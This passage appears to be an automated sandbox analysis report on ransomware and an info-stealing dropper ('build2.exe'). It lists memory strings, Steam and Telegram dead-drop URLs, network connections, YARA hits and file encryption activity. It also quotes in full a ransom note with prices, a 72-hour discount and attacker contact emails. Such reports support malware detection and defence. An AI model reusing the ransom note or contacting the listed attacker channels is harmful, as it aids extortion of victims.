Source: build2.exe, 00000007.00000002.1787690913.0000000003560000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1889987527.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1852670646.0000000000921000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/badges
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1852670646.0000000000921000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/inventory/
Source: build2.exe, 00000008.00000002.1967987129.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1889987527.00000000008FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888_
Source: build2.exe, 00000007.00000002.1787690913.0000000003560000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888ve74rMozilla/5.0
Source: build2.exe, 00000008.00000003.1852670646.0000000000921000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/work
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1852670646.0000000000921000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1852670646.0000000000921000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1852670646.0000000000921000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1852670646.0000000000921000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1852670646.0000000000921000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1852670646.0000000000921000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1852670646.0000000000921000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1852670646.0000000000921000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, IIJEBAEC.8.dr String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: IIJEBAEC.8.dr String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, IIJEBAEC.8.dr String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: IIJEBAEC.8.dr String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17e
Source: build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17xe
Source: build2.exe, 00000007.00000002.1787690913.0000000003560000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/irfail
Source: build2.exe, 00000007.00000002.1787690913.0000000003560000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/irfailAt
Source: SUwX12D2S6.exe, 00000006.00000002.4130188988.0000000000802000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wetransfer.cQ
Source: SUwX12D2S6.exe, 00000004.00000003.2243152678.00000000008EC000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000002.2244414394.00000000008C1000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000002.2244719512.00000000008ED000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2233205692.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2215516667.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000002.2245638773.00000000030B0000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000006.00000002.4130188988.00000000007B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27
Source: SUwX12D2S6.exe, 00000006.00000002.4131298857.00000000030ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wetransfer.com/downloadsW
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.66.133.162:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 95.217.9.149:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC, 1_2_004822E0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\_README.txt Dropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.Do not ask assistants from youtube and recovery data sites for help in recovering your data.They can use your free decryption quota and scam you.Our contact is emails in this text document only.You can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27Price of private key and decrypt software is $999.Discount 50% available if you contact us first 72 hours, that's price for you is $499.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshingmail.topReserve e-mail address to contact us:datarestorehelpyou@airmail.ccYour personal ID:0864PsawqSitkm7MOsOlVQkbEQhWCVEWoMyGFhVjgEdpNlgfiz Jump to dropped file
Source: Yara match File source: Process Memory Space: SUwX12D2S6.exe PID: 7396, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SUwX12D2S6.exe PID: 7488, type: MEMORYSTR
Source: Yara match File source: 24.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SUwX12D2S6.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.SUwX12D2S6.exe.5e615a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SUwX12D2S6.exe.5e115a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.SUwX12D2S6.exe.5ed15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.SUwX12D2S6.exe.5e715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.SUwX12D2S6.exe.5ed15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.SUwX12D2S6.exe.5e615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.SUwX12D2S6.exe.5e715a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.SUwX12D2S6.exe.5de15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.SUwX12D2S6.exe.5de15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1676946978.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1719252737.0000000005E60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2243904603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1694613073.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2116911139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4129272399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1701674378.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2105470149.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1848123271.0000000005E70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1864325643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SUwX12D2S6.exe PID: 7260, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SUwX12D2S6.exe PID: 7276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SUwX12D2S6.exe PID: 7376, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SUwX12D2S6.exe PID: 7396, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SUwX12D2S6.exe PID: 7460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SUwX12D2S6.exe PID: 7488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SUwX12D2S6.exe PID: 7772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SUwX12D2S6.exe PID: 7792, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SUwX12D2S6.exe PID: 7264, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SUwX12D2S6.exe PID: 7252, type: MEMORYSTR
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File moved: C:\Users\user\Desktop\UMMBDNEQBN.xlsx Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File deleted: C:\Users\user\Desktop\UMMBDNEQBN.xlsx Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File moved: C:\Users\user\Desktop\VLZDGUKUTZ\DVWHKMNFNN.png Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File deleted: C:\Users\user\Desktop\VLZDGUKUTZ\DVWHKMNFNN.png Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File moved: C:\Users\user\Desktop\VLZDGUKUTZ.docx Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File dropped: C:\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File dropped: C:\$WinREAgent\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt -> decryption settings;change encryption settings"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevices.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevices"},"system.comment":{"type":12,"value":"bluetooth and other devices settings"},"system.highkeywords":{"type":12,"value":"device;projector;projectors;pair bluetooth device;unpair device;pair device;bluetooth settings;add bluetooth device;add device"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevicespen-2.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevicespen"},"system.comment":{"type":12,"value":"pen and windows ink settings"},"system.highkeywords":{"type":12,"value":"pens;handedness;cursor;cursors;writing;write;workspace;pen shortcuts;h Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appsglobals.txt -> decrypter\dvddecrypter.exe12438{6d809377-6af0-444b-8957-a3773f02200e}\renderdoc\qrenderdoc.exe12438{6d809377-6af0-444b-8957-a3773f02200e}\microsoft system center 2012 r2\service manager\microsoft.enterprisemanagement.servicemanager.ui.console.exe12438microsoft.appv.603b45325cf2a147a217bc0826e85cce12439{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\pro evolution soccer 2018\pes2018.exe12439c:\ignition\ignitioncasino.exe12440{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\splashdata\splashid safe\splashid safe.exe12440{6d809377-6af0-444b-8957-a3773f02200e}\native instruments\komplete kontrol\komplete kontrol.exe1244025342asdf3333.stoppuhrtimer_1xbryz0n7krfa!app12441{6d809377-6af0-444b-8957-a3773f02200e}\owasp\zed attack proxy\zap.exe12441{6d809377-6af0-444b-8957-a3773f02200e}\dell\toad for oracle 2015 r2 suite\toad for oracle 12.8\toad.exe12441{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\mysql\mysql workbench 6.0 ce\mysqlworkbench.exe12441212377tik.7tik-tiktokforwindows_da70t93mgq52j!app12442{7c Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{97b27011-f8cc-4ac9-9531-d6ee8ce92324}\0.0.filtertrie.intermediate.txt -> decryption settings~decrease zoom level~decrease volume~decrease mouse speed~decrease mouse acceleration~decrease brightness~decode~decice~deault~deaf~deafult~ddevice~daylight saving time on or off~davice~dates~date time~date settings~date and time~date and time settings~date and time from a time server~date and time formats~data~data you send to microsoft~data viewer~data usage overview~data to improve narrator~data systemwide~data settings~data sense~data saver~data restore~data plan~data limit~data instead of wifi~data for all apps~data connection with other devices~data captured by windows mixed reality~dark~darker touch feedback~dark theme~dark theme settings~dark mode systemwide~dark mode settings~dark mode for apps~dark colours~dark colors~dafault~c~cutting and pasting~cut and paste~customizing~customize~customize narrator sounds setting~customize narrator sound effects setting~customising~cust Jump to dropped file
